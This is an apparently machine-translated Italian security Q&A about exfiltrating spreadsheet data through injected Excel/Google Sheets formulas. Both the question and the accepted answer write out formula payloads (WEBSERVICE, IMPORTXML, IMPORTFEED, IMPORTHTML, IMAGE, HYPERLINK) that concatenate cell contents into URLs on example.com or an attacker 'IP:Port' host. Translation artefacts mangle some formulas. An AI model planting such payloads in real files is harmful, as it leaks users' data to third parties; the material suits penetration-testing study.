Esamina i dati iniettando funzioni nel file Excel 2007 reso con PHP

Question

Esamina i dati iniettando funzioni nel file Excel 2007 reso con PHP

#1 da (1 voti)

4

Ho bisogno di estrarre i dati da una fille di Excel usando le funzioni di Excel 2007.

Il concetto è in qualche modo correlato al tipo di estrazione dei dati XSS memorizzato, solo che ho bisogno di utilizzare le funzioni di Excel 2007 (che sono riuscito a iniettare nelle celle del file) per fare in modo che l'utente carichi automaticamente un'immagine, un percorso web o faccia una richiesta DNS.

Fino ad ora ho provato i seguenti, ma non sono riusciti perché il file Excel è reso in PHP con le funzioni di Excel 2007:

=IMPORTDATA(CONCATENATE("https://example.com/", C2))
=WEBSERVICE(CONCATENATE("https://example.com/", C2))

Ho iniettato con successo:

=HYPERLINK(CONCATENATE("https://example.com/",C2), "HYPERLINK HIJACKING")

Ma in questo modo devo ingannare un utente per aprire il link da solo (non impossibile, ma non divertente: D).

excel injection office exfiltration

posta Lucian Nitescu 16.04.2018 - 13:26

fonte

1 risposta

Leggi altre domande sui tag excel injection office exfiltration

Volatilità Forensics with Large dumps Un MAC può essere usato come un Token PCI irreversibile?

score 1 · Accepted Answer

Dopo alcune prove ed errori, sono riuscito a estrarre i dati ma trovo che il seguente articolo sia una delle risorse più complete per l'estrazione dei dati utilizzando la formula excel:

link

CONCATENATE: aggiunge le stringhe l'una all'altra.

= CONCATENA (A2: E2)

IMPORTXML: importa i dati da vari tipi di dati strutturati inclusi XML, HTML, CSV, TSV e feed RSS e ATOM XML.

= IMPORTXML (CONCAT (" link IP: Port] /123.txt?v=", CONCATENATE (A2: E2)), "/ / a / A10" )

IMPORTFEED: importa un feed RSS o ATOM.

= IMPORTFEED (CONCAT (" link IP: Port] // 123.txt? v=", CONCATENATE (A2: E2)))

IMPORTHTML: importa i dati da una tabella o un elenco all'interno di una pagina HTML.

= IMPORTHTML (CONCAT (" link IP: Port] /123.txt?v=", CONCATENATE (A2: E2)), "tabella ", 1)

IMPORTRANGE: importa un intervallo di celle da un foglio di calcolo specificato.

= IMPORTRANGE (" link ", "foglio1! A2: E2")

IMAGE: inserisce un'immagine in una cella.

= IMAGE (" link IP: Port] /images/srpr/logo3w.png")